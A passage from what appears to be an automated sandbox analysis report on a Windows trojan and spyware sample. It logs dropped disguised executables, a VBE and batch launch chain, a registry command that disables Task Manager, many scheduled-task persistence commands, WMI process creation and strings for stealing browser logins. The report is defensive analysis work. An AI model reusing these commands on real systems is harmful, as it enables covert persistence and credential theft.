                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7D964826_2_00007FFD9B7D9648
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7D956926_2_00007FFD9B7D9569
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7D8E6126_2_00007FFD9B7D8E61
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7D8ED326_2_00007FFD9B7D8ED3
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B80100026_2_00007FFD9B801000
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B80CE5826_2_00007FFD9B80CE58
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B80951326_2_00007FFD9B809513
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7D0D4826_2_00007FFD9B7D0D48
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7D0E4326_2_00007FFD9B7D0E43
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 27_2_00007FFD9B7C0D4827_2_00007FFD9B7C0D48
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 27_2_00007FFD9B7C0E4327_2_00007FFD9B7C0E43
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7D000031_2_00007FFD9B7D0000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7D02F231_2_00007FFD9B7D02F2
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7D02D331_2_00007FFD9B7D02D3
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7D00D331_2_00007FFD9B7D00D3
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7C0D4831_2_00007FFD9B7C0D48
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7C0E4331_2_00007FFD9B7C0E43
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7FD8F531_2_00007FFD9B7FD8F5
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7F100031_2_00007FFD9B7F1000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B80275831_2_00007FFD9B802758
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7F951331_2_00007FFD9B7F9513
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7C964831_2_00007FFD9B7C9648
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7C956931_2_00007FFD9B7C9569
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7C8E6131_2_00007FFD9B7C8E61
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7C8ED331_2_00007FFD9B7C8ED3
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9BBBB51331_2_00007FFD9BBBB513
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 34_2_00007FFD9B80100034_2_00007FFD9B801000
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 34_2_00007FFD9B80CE5834_2_00007FFD9B80CE58
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 34_2_00007FFD9B80951334_2_00007FFD9B809513
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 34_2_00007FFD9B7D0D4834_2_00007FFD9B7D0D48
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 34_2_00007FFD9B7D0E4334_2_00007FFD9B7D0E43
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 34_2_00007FFD9B7E000034_2_00007FFD9B7E0000
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 34_2_00007FFD9B7E02F234_2_00007FFD9B7E02F2
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 34_2_00007FFD9B7E02D334_2_00007FFD9B7E02D3
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 34_2_00007FFD9B7E00D334_2_00007FFD9B7E00D3
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 34_2_00007FFD9B7D964834_2_00007FFD9B7D9648
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 34_2_00007FFD9B7D956934_2_00007FFD9B7D9569
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 34_2_00007FFD9B7D8E6134_2_00007FFD9B7D8E61
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 34_2_00007FFD9B7D8ED334_2_00007FFD9B7D8ED3
                                    Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                    Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                    Source: Joe Sandbox ViewDropped File: C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: String function: 0059F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: String function: 0059EC50 appears 56 times
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: String function: 0059EB78 appears 39 times
                                    Source: GoOOBNnj.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: 1znAXdPcM5.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 1znAXdPcM5.exe
                                    Source: 1znAXdPcM5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                    Source: Agentcomponentbrokermonitordhcp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: RuntimeBroker.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe0.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe1.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@41/38@1/1
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_00586C74 GetLastError,FormatMessageW,0_2_00586C74
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0059A6C2
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeFile created: C:\Users\user\AppData\Roaming\LocalJump to behavior
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_03
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-4vN0EXGexU6B21K1d7FI
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\ELi4IhX1eHmQ2UsaOienYgDzI4HKnyNJ9ZRwGYArPHIQTcsLe.bat" "
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCommand line argument: sfxname0_2_0059DF1E
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCommand line argument: sfxstime0_2_0059DF1E
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCommand line argument: STARTDLG0_2_0059DF1E
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCommand line argument: xz]0_2_0059DF1E
                                    Source: 1znAXdPcM5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 1znAXdPcM5.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: 4aWztmXmFN.31.dr, s64qcwfi16.31.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4167570686.000000001C750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera').0\;C:\W
                                    Source: 1znAXdPcM5.exeVirustotal: Detection: 49%
                                    Source: 1znAXdPcM5.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeFile read: C:\Users\user\Desktop\1znAXdPcM5.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\1znAXdPcM5.exe "C:\Users\user\Desktop\1znAXdPcM5.exe"
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\ELi4IhX1eHmQ2UsaOienYgDzI4HKnyNJ9ZRwGYArPHIQTcsLe.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe "C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe"
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 6 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 8 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 5 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 14 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Agentcomponentbrokermonitordhcp" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /rl HIGHEST /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /rl HIGHEST /f
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: unknownProcess created: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe "C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: unknownProcess created: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe "C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe"
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\ELi4IhX1eHmQ2UsaOienYgDzI4HKnyNJ9ZRwGYArPHIQTcsLe.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe "C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe"Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: uxtheme.dllJump to behavior
